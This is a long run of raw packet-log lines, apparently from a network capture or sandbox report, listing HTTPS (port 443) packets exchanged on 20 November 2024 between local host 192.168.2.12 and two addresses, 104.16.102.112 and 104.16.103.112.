                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.171267986 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.175440073 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.175565004 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.179199934 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.179210901 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.179259062 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.187922955 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.187980890 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189429998 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189450026 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189471006 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189536095 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189563990 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189575911 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.189629078 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.192646980 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.192724943 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.200779915 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.200833082 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.205533028 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.205554962 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.205678940 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.205678940 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.205702066 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.209428072 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.209496021 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.214167118 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.214226007 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.219285011 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.219321012 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.219346046 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.219367027 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.219423056 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.222887039 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.222948074 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.231169939 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.231267929 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.234601974 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.234622002 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.234731913 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.234755993 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.234785080 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.235651016 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.235721111 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.244160891 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.244262934 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.252706051 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.252774954 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.277308941 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331501961 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331532955 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331588984 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331607103 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331657887 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.331657887 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.343941927 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.343971014 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.344096899 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.344118118 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.344263077 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356023073 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356045008 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356141090 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356149912 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356168032 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.356261015 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.359949112 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.360018969 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.365375996 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.365431070 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.365946054 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.365962982 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.366070032 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.366077900 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.366708994 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372544050 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372617960 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372633934 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372664928 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372692108 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.372711897 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.373050928 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.373065948 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.377531052 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.377551079 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.377661943 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.377671003 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.377990961 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.378072977 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.378098011 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.378190041 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.378441095 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.378453016 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.388312101 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.388331890 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.388448954 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.388463974 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.388601065 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.399133921 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.399167061 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.399204969 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.399213076 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.399333000 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.409961939 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.409981012 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.410283089 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.410293102 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.411048889 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.526146889 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.526170015 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.526261091 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.526298046 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.526401043 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534260035 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534279108 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534405947 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534405947 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534419060 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.534816027 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.542226076 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.542244911 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.542340040 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.542347908 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.542454958 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.550235987 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.550257921 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.550383091 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.550412893 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.550888062 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.557302952 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.557322979 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.557403088 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.557427883 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.557487965 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.564589024 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.564606905 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.564670086 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.564692974 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.564939022 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.570780993 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.570826054 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.570857048 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.570874929 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.570943117 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.577955008 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.577975035 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.578037977 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.578057051 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.578188896 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.590889931 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591028929 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591074944 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591092110 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591118097 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591228962 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.591238022 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.608159065 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.608197927 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.608210087 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.608220100 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.608268023 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.617021084 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.618997097 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.619280100 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.619307041 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.620372057 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.620434046 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.620839119 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.620907068 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.621005058 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.621084929 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.625907898 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.625983000 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.625998974 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.667211056 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.667212963 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.667227983 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.667232990 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.710870981 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.711168051 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.711199045 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.711554050 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.711910009 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.711977959 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.712192059 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.712688923 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.712703943 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.712717056 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.717237949 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.717271090 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.717344046 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.717356920 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.717415094 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.723539114 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.723567963 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.723716021 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.723722935 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.723820925 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.730734110 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.730752945 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.731019020 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.731019020 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.731028080 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.731163979 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739070892 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739104033 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739161968 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739167929 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739193916 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.739286900 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.745518923 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.745551109 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.745601892 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.745610952 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.745696068 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.752810001 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.752832890 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.752912045 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.752923012 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.753113031 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.759335041 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760627031 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760647058 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760715961 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760725975 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760776997 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.760776997 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.762067080 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.768378973 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.768402100 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.768476009 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.768486977 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.768585920 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.791932106 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.820281982 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.820346117 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.820379019 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.828049898 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.828104973 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.828107119 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.828118086 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.828152895 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.835716009 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.835798979 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.835850954 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.836024046 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.836040974 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.836054087 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.836299896 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.853372097 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.853677034 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.853702068 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.854042053 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.854486942 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.854551077 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.854866028 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.899337053 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908731937 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908754110 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908819914 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908834934 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908869982 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.908869982 CET49781443192.168.2.12104.16.102.112
